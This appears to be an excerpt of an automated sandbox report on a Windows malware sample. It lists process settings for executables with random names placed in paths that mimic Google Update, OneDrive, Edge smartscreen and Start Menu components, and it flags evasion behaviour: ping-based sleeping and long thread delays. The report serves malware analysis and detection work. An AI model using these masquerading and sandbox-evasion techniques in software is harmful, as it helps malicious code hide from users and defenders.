                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX

                              Malware Analysis System Evasion

                              barindex
                              Uses ping.exe to sleep
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeMemory allocated: 1860000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeMemory allocated: 1B460000 memory reserve | memory write watchJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeMemory allocated: B00000 memory reserve | memory write watchJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeMemory allocated: 1A6C0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeMemory allocated: 1900000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeMemory allocated: 1B2F0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeMemory allocated: 840000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeMemory allocated: 1A400000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeMemory allocated: 16B0000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeMemory allocated: 1B320000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeMemory allocated: 17E0000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeMemory allocated: 1B2A0000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeMemory allocated: 1380000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeMemory allocated: 1AE90000 memory reserve | memory write watch
                              Source: C:\Recovery\StartMenuExperienceHost.exeMemory allocated: 1440000 memory reserve | memory write watch
                              Source: C:\Recovery\StartMenuExperienceHost.exeMemory allocated: 1AFE0000 memory reserve | memory write watch
                              Source: C:\Recovery\StartMenuExperienceHost.exeMemory allocated: 1170000 memory reserve | memory write watch
                              Source: C:\Recovery\StartMenuExperienceHost.exeMemory allocated: 1AE10000 memory reserve | memory write watch
                              Source: C:\Recovery\StartMenuExperienceHost.exeMemory allocated: 1230000 memory reserve | memory write watch
                              Source: C:\Recovery\StartMenuExperienceHost.exeMemory allocated: 1AC70000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 600000Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 599873Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 599765Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 599656Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 599546Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 599437Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 599328Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 599218Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 599109Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 598999Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 598890Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 3600000Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 598781Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 598671Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 598562Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 598453Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 598343Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 598234Jump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeThread delayed: delay time: 598125Jump to behavior
